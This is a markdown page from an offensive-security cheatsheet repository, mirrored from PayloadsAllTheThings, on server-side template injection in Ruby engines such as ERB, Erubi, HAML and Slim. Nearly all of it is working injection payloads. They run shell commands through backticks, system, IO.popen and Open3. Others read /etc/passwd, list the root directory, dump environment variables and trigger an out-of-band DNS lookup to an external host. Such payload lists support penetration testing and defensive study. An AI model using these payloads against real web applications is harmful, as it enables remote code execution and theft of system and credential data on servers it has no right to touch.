daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ruby.md (3050B)


      1 ---
      2 title: "Server Side Template Injection - Ruby"
      3 topic: "Server Side Template Injection"
      4 topicSlug: "server-side-template-injection"
      5 sourcePath: "Server Side Template Injection/Ruby.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Template%20Injection/Ruby.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Server Side Template Injection - Ruby
     12 
     13 > Server-Side Template Injection (SSTI)  is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.
     14 
     15 ## Summary
     16 
     17 - [Templating Libraries](#templating-libraries)
     18 - [Universal Payloads](#universal-payloads)
     19 - [Ruby](#ruby)
     20     - [Ruby - Basic injections](#ruby---basic-injections)
     21     - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
     22     - [Ruby - List files and directories](#ruby---list-files-and-directories)
     23     - [Ruby - Remote Command execution](#ruby---remote-command-execution)
     24 - [References](#references)
     25 
     26 ## Templating Libraries
     27 
     28 | Template Name | Payload Format |
     29 |---------------|----------------|
     30 | Erb           | `<%= %>`       |
     31 | Erubi         | `<%= %>`       |
     32 | Erubis        | `<%= %>`       |
     33 | HAML          | `#{ }`         |
     34 | Liquid        | `{{ }}`        |
     35 | Mustache      | `{{ }}`        |
     36 | Slim          | `#{ }`         |
     37 
     38 ## Universal Payloads
     39 
     40 Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim.
     41 
     42 To use these payloads, wrap them in the appropriate tag.
     43 
     44 ```ruby
     45 %x('id') # Rendered RCE
     46 File.read("Y:/A:/"+%x('id')) # Error-Based RCE
     47 1/(system("id")&&1||0) # Boolean-Based RCE
     48 system("id && sleep 5") # Time-Based RCE
     49 ```
     50 
     51 ## Ruby
     52 
     53 ### Ruby - Basic injections
     54 
     55 **ERB**:
     56 
     57 ```ruby
     58 <%= 7 * 7 %>
     59 ```
     60 
     61 **Slim**:
     62 
     63 ```ruby
     64 #{ 7 * 7 }
     65 ```
     66 
     67 ### Ruby - Retrieve /etc/passwd
     68 
     69 ```ruby
     70 <%= File.open('/etc/passwd').read %>
     71 ```
     72 
     73 ### Ruby - List files and directories
     74 
     75 ```ruby
     76 <%= Dir.entries('/') %>
     77 ```
     78 
     79 ### Ruby - Remote Command execution
     80 
     81 Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.
     82 
     83 ```ruby
     84 <%=(`nslookup oastify.com`)%>
     85 <%= system('cat /etc/passwd') %>
     86 <%= `ls /` %>
     87 <%= IO.popen('ls /').readlines()  %>
     88 <% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
     89 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
     90 ```
     91 
     92 Execute code using SSTI for **Slim** engine.
     93 
     94 ```powershell
     95 #{ %x|env| }
     96 ```
     97 
     98 ## References
     99 
    100 - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
    101 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)